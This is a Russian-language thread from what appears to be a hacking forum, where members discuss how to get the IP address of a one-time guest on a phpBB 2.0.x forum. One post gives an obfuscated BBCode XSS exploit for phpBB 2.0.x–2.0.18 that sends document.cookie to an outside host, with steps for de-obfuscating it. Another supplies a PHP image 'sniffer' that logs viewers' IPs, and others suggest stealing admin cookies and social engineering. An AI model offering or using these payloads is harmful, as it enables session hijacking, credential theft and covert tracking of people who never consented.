По сабжу... Если ты админ/модер/супер модер или другой пользователь привилегированый на просмотр Ip, то подумать еще можно
Fatal error: Call to undefined function: get_ip_addr_by_forum_url() in /home/a/123.h17.ru/WWW/ip.php on line 3 А я вроди правильно сделал..
Вы что прикалываетесь? Вы приколы понимаете? ТС , ты можеш написать свой вопрос в нормальной форме? ИП кого тебе нужен? Если самого хостинга где лежит форум, то PHP: <?php $hostname = "forum.antichat.ru"; $address = gethostbyname ($hostname); echo $address; ?> А если тебе нужен ИП отдельного юзера, то применяй СИ. Второй момент. Если ты являешся администратором форума, или можератором. Если ты им являешся, то ты полюбом должен знать как узнать у юзера его ИП )) А ещё, возможно эта функция get_ip_addr_by_forum_url() существует. Но её можна использовать только в самих уже скриптах форума, т.е тебе нужно инжектить свой скрипт в файлы форума
n3m0 )))Если б я php знал,то дорубился бы,что прикол) мне нужно узнать ИП гостя не имея Админ и модер привелегий... Гость сидел 1 раз и больше на форуме не появляется..Версия форума phpBB 2.0.x
Это не реально... я писал скрипт для определения IP по аватаре в phpBB но для этого пользователь должен быть зареген, и у него должна быть аватара
А поискать на форуме самому? лан, вот здесь скрипт на php: http://forum.antichat.ru/showthread.php?p=375578#post375578
phpBB 2.0.x-2.0.18 Цель: получение hash'a пароля пользователя PHP: [UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL] Что бы воспользоваться сплойтом убираем плюсы между символами & и #(например было "&+#40" стало -"(") а также убераем "*" Это думаю подойдет..
Вы издеваетесь над бедным юзером? ^^ Этому начинающему хакеру прямая дорога в раздел "снифер или как юзать пассивные xss"
Можно сделать что-то типо картинки на PHP, которая будет записывать IP в файл. Вобщем в какую-нибудь папку с правами 0777 заливаешь файл smile.php с содержанием: PHP: <? header('Content-Type: image/gif'); readfile('http://i011.radikal.ru/0712/b4/4ff2bf1bf9b5.gif'); $file = fopen('ip.txt', 'a'); fwrite($file, getenv('REMOTE_ADDR')."\n"); fclose($file); ?> и на форуме просто, в теге
Кто-нить вообще читал,что я писал??? А Я ПИСАЛ;ЮЗЕР ПИСАЛ ПОД ГОСТЕМ НА ФОРУМЕ И БОЛЬШЕ НЕ СИДЕЛ НА ФОРУМЕ!А МНЕ НУЖНО УЗНАТЬ ЕГО Ip,КОТОРЫЙ ПРОБИЛСЯ НА ФОРУМЕ! Так вы пишете снифф...Сниф нужно что бы юзер запустил!(Прошол по ссылке).Тогда пробьётся его Ip +Куки!
В случае если гость больше не заходит на форум, то ip написанного сообщения тебе можно будет узнать лишь имея неплохие права модератора/админа на этом форуме. По другому это нельзя сделать т.к. все обрабатывается на уровне сервера и если айпи не виден в исходном коде странички с сообщением, то он не будет там виден и с нашей помощью. Хороший вариант стыбрить через xss куки админа и посмотреть ip от его лица. Хотя вообще не могу придумать зачем тебе айпи гостя, разве что узнать где и кто у него провайдер, т.к. айпи меняется каждый раз, когда ты подсоединяешься к сети.
ТС ты хочешь невозможного =/ Если юзер был только один раз и то под гостем, т.е. не зарегин на форуме и не оставил ни одного сообщения, то его Ip вообще врядли где-то сохранился.....если только в статистике сайта среди многочисленных логов. Даже если б ты был админом форума, то ты очень врядли узнаешь айпи какого-то гостя, который когда-то заходил....скока этих гостей заходит в день. Блять, вы даёте....какие нахрен куки тырить??? у кого? у гостя??который тока один раз зашёл на форум! Давайте стырим куки у гостя и зайдём на форум под другим гостем=/ а потом буим понтоваться что мы умеем заходить на форум под чужим гостем=// оригинально... мммда...почитай маны про способы подключения к сети.... ТС забей на эту затею, не узнаешь ты айпи юзера...если б был хотя бы зарегин на форуме, то тут можно было бы и покопаться, а тут как я уже говорил, даже сам админ очень врядли что найдёт этот айпи....т.к. в Базе данных форума он врядли сохраняется...а если б сохранялись айпишники всех гостей, то база данных бы весила хрен знает скока =/
Хм... Снифер используется не только для получения куков, но и для получения айпи смотрящего на картинку снифера(для этого даже не надо искать xss уязвимость). Другое дело, что "злоумышленник" должен знать точно что этот гость просматривает его сообщение с гифом. Меня поражают люди, которые думают что статистический юзер интернета проплачивает дополнительно провайдеру услугу статичного ip. Уважаемый, скажите честно, у вас каждый день при подключении к сети один и тот же айпи (хотя, даже если прокси, то ее тоже нужно менять время от времени)?
У меня динамический, сижу на диалапе =/ до этого сидел на выделенке со статическим айпи. И при чём тут доплачивать или нет? З.Ы предлогаю больше не флеймить в теме)
